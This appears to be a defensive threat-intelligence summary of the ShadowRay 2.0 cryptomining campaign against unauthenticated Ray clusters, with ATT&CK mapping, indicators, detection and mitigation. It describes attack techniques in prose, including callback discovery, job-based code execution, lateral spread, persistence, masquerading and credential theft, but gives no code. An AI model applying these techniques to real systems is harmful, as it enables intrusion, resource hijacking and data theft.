Full Report
ShadowRay 2.0 targets Ray clusters whose dashboard / Jobs API is exposed without authentication. Attackers first use interact.sh (oast.fun) for out-of-band discovery, posting test jobs to /api/jobs/ that trigger HTTP/DNS callbacks to identify exploitable Ray dashboards. Once a...
Analysis Summary
# Tool/Technique: ShadowRay 2.0
## Overview
ShadowRay 2.0 is a cryptomining campaign that specifically targets Ray clusters where the dashboard or Jobs API is exposed without proper authentication. The campaign utilizes various techniques for discovery, achieving remote code execution (RCE), lateral movement within the cluster, credential theft, and establishing persistence, ultimately co-opting the computing resources for cryptojacking and data exfiltration.
## Technical Details
- Type: Campaign / Malware framework (Involves multiple custom and known malicious components)
- Platform: Linux (Implied by ELF loaders, cron/systemd persistence, and targeting components like Ray)
- Capabilities: Out-of-band discovery, RCE via job submission, lateral movement via legitimate orchestration, cryptojacking, persistence setup, data exfiltration, worm-like propagation.
- First Seen: November 19, 2025 (as per public report date)
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1190 - Exploit Public-Facing Application (Leveraging unauthenticated Ray APIs, linked to CVE-2023-48022)
- TA0008 - Lateral Movement
- T1021 - Remote Services (Abusing Ray's NodeAffinitySchedulingStrategy to push jobs across nodes)
- TA0003 - Persistence
- T1136 - Create Account (Adding SSH keys)
- T1053.001 - Scheduled Task/Job: Cron
- T1053.005 - Scheduled Task/Job: Scheduled Task
- TA0005 - Defense Evasion
- T1036.005 - Match Legitimate Name or Location (Process masquerading, e.g., `kworker/0:0`, `dns-filter`, `.python3.6`)
- TA0009 - Collection
- T1004 - Data from Local System (Exfiltrating MySQL credentials, cloud tokens, source code)
- TA0011 - Command and Control
- T1071.001 - Application Layer Protocol: Web Protocols (Using GitLab/GitHub releases for C2)
## Functionality
### Core Capabilities
- **Discovery & Validation:** Uses `interact.sh` (oast.fun) to post test jobs to `/api/jobs/` to trigger HTTP/DNS callbacks, identifying exploitable, unauthenticated Ray dashboards.
- **Remote Code Execution (RCE):** Submits multi-stage Bash and Python payloads via Ray jobs, exploiting behavior tracked as CVE-2023-48022.
- **Initial Execution & Reconnaissance:** Payloads gather environment details (CPU/GPU count, cloud context, credentials) and search for secrets (cloud/database).
- **Lateral Movement:** Leverages Ray’s legitimate `NodeAffinitySchedulingStrategy` to push malware jobs to every alive node in the cluster, achieving internal spread without additional exploits.
- **Cryptojacking:** Deploys XMRig and Rigel miners to hijack CPU/GPU resources.
### Advanced Features
- **Worm Capability:** Deploys "ShadowRay probes" to scan and attack new Ray instances, turning the botnet into self-propagating malware targeting AI infrastructure.
- **Persistence Mechanisms:** Creates SSH backdoors (adds SSH keys) and uses cron/systemd services masquerading as health/DNS components (e.g., `run.sh`, `mon.sh`).
- **Stealth and Evasion:**
- Caps CPU/GPU usage at approximately 60% to avoid performance degradation detection.
- Hides GPU usage from Ray’s internal metrics.
- Employs process masquerading (e.g., using names like `kworker/0:0`, `.python3.6`).
- Kills competing miners.
- Blocks rival mining pools via modifying `/etc/hosts` and `iptables`.
- **Data Exfiltration:** Steals MySQL credentials, cloud tokens, proprietary AI models, and source code.
- **Additional Malicious Use:** Uses the `sockstress` tool for launching Denial of Service (DDoS) attacks.
- **Evolving C2 Infrastructure:** Initially used GitLab for C2 and distribution; migrated use to GitHub release artifacts after being banned.
## Indicators of Compromise
- File Hashes: (Not specified in the context)
- File Names: `run.sh`, `run-CN.sh`, `mon.sh`, `aa.sh` (Scripts found on compromised nodes)
- Registry Keys: (Not applicable/specified for Linux environments mentioned)
- Network Indicators:
- Out-of-band testing domain: `oast[.]fun` (used via `interact.sh`)
- C2/Distribution Platforms: GitLab repositories (initial), GitHub repositories (subsequent)
- Behavioral Indicators:
- Job submissions to Ray `/api/jobs/`.
- Creation of new cron jobs/systemd services with obfuscated names.
- Installation and execution of XMRig or Rigel miners.
- Modification of `/etc/hosts` to block specific IP ranges/domains.
## Associated Threat Actors
- 🪙IronErn440
## Detection Methods
- **Signature-based detection:** Signatures for known miner binaries (XMRig, Rigel) or the specific ELF loaders being dropped.
- **Behavioral detection:** Monitoring for jobs submitted to Ray APIs that include shell commands or Python code designed for reconnaissance or deployment, rather than legitimate machine learning tasks. Monitoring for high resource utilization inconsistent with normal Ray activity (even if capped at 60%). Detecting modifications to `/etc/hosts` or `iptables` that block external IPs.
- **YARA rules:** Could be created for the custom script patterns (`run.sh`, etc.) or identified ELF droppers.
## Mitigation Strategies
- **Authentication Enforcement:** Ensure the Ray dashboard and Jobs API are **not exposed without strict authentication**. This is the primary point of failure targeted by ShadowRay 2.0.
- **Principle of Least Privilege:** Restrict network access to Ray components to trusted internal networks only.
- **Vulnerability Patching:** Apply patches related to CVE-2023-48022 immediately.
- **Runtime Monitoring:** Monitor orchestration systems (like Ray’s scheduler) for anomalous job submissions that include system command execution (Bash/Python running arbitrary code).
- **Network Segmentation:** Isolate compute nodes from external networks where possible.
## Related Tools/Techniques
- **cryptomining malware:** XMRig, Rigel
- **OAST Tool:** interact.sh (oast.fun)
- **Lateral Movement Technique:** Abuse of orchestrator features (`NodeAffinitySchedulingStrategy`) for host-to-host movement.
- **DDoS Tool:** sockstress